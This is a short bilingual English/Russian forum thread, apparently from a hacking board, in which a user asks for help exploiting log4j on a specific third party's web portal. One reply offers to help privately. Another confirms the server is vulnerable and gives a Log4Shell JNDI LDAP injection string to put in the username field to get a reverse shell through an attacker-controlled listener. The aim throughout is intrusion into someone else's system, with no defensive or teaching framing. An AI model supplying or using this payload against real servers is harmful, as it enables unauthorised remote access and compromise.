Log4j vulnerability

[th3hack34]

I found the following GitHub gist.

As you can see, they have a web portal that uses python and log4j on this server's portal.

Can someone help me to check for vulnerabilities and if so, how to exploit them?

--
Я обнаружил следующее gist

Как вы можете видеть, у них есть веб-портал, который использует python и log4j на портале этого сервера.

Может ли кто-нибудь помочь мне проверить наличие уязвимостей, и если да, то как их использовать?

 

[Nommik]

Да, можно, скинь в личку

 

[c0cker]

I found the following GitHub gist.

Посмотреть вложение 35012

As you can see, they have a web portal that uses python and log4j on this server's portal.

Can someone help me to check for vulnerabilities and if so, how to exploit them?

--
Я обнаружил следующее gist

Как вы можете видеть, у них есть веб-портал, который использует python и log4j на портале этого сервера.

Может ли кто-нибудь помочь мне проверить наличие уязвимостей, и если да, то как их использовать?

This server is vulnerable to LOG4J.
You can open a reverse shell by entering ${jndi:ldap://your_public_ip:port/f} in the username field. (you must leave a process listening on that port).

I think that is the same portal you shared, but I am not sure. It has the same local ip address: